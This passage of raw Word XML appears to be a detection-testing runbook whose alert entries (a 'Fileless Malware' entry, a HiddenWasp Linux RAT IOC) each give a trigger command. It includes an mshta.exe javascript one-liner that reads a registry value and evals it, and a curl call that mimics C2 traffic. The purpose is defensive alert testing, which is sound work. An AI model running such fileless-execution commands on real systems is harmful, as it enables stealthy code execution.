    <w:p w14:paraId="713B5994" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Threat Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE88179" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBBB86D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSE Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129F13A7" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC1B047" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50947FFD" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> N/A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFEF1D6" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no preparation required to run this trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E909248" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo test &gt;&gt; C:\Users\Administrator\AppData\Roaming\kb6867.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B48B197" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED1DB1A" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43CF47FE" w14:textId="261C7E3F" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="412D9031" wp14:editId="7F21817E">
            <wp:extent cx="5731510" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="58678955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02585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0209A30F" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C12A60" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D61E6" w:rsidRPr="000D61E6" w14:paraId="54EAC980" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7B8379FE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t xml:space="preserve">Fileless Malware </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DEC034D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity: </w:t>
            </w:r>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62478EE4" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t xml:space="preserve">Description: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E41ACA6" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t xml:space="preserve">Observation Type: </w:t>
            </w:r>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Threat Detection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="688944C1" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t xml:space="preserve">History: </w:t>
            </w:r>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7 days</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="751F820B" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t xml:space="preserve">Telemetry: </w:t>
            </w:r>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>CSE Alert</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54CCC958" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK Tactic:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F551DCB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK Technique:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F64D302" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t>Special Considerations:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29FFBA89" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
              <w:t xml:space="preserve">Preparation Command: </w:t>
            </w:r>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>no preparation required to run this trigger</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52A3E632" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Trigger Command:  </w:t>
            </w:r>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C:\windows\system32\mshta.exe javascript:TYU21PU=JhhVT7;A4B=new%20ActiveXObject(WScript.Shell);nOU2YKx=6;qFD12x=A4B.RegRead(HKCU\\software\\HoarRyq\\SwKG8k);ii4pBY=IkA;eval(qFD12x);WhpJ2JZr=AU;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74C2F07D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-CA"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7590F3ED" w14:textId="104A9F9D" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D61E6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C017DC0" wp14:editId="31254DAC">
                  <wp:extent cx="5731510" cy="1668145"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
                  <wp:docPr id="3709927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668145"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E411DD3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3321F7D4" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="392D4121" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="182862E9" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606748E7" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7564B1F6" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330C27B9" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745CB9B3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux.HiddenWasp.ioc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CEB89" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F4A2A3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Severity: Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05102614" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Description: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HiddenWasp is a Linux based remote access trojan (RAT) with code similarities to Mirai and the Azazel rootkit. The main purpose of this malware is to install a backdoor for remote control and access to the infected system. It is not known to have any crypto mining or DDoS functionalities as is in common Linux malware. This IOC targets the initial C2 traffic which is executed using curl and URLs containing hard coded messages in the query string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57917F18" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type: Cloud IOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C58D8B" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History: 7 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD3CE75" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry: CSE Alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A44AD9" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Tactic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD859B2" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF5ED09" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Special Considerations: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28935746" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> no preparation required to run this trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3787EC93" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="000D61E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://google.com/test?data=upgrade+shell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="748B9C90" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B02465C" w14:textId="0B467B0F" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3041DFFB" wp14:editId="695D08BE">
            <wp:extent cx="5731510" cy="1509395"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="152440685"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509395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11520F9E" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="142DCBDC" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF277E3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
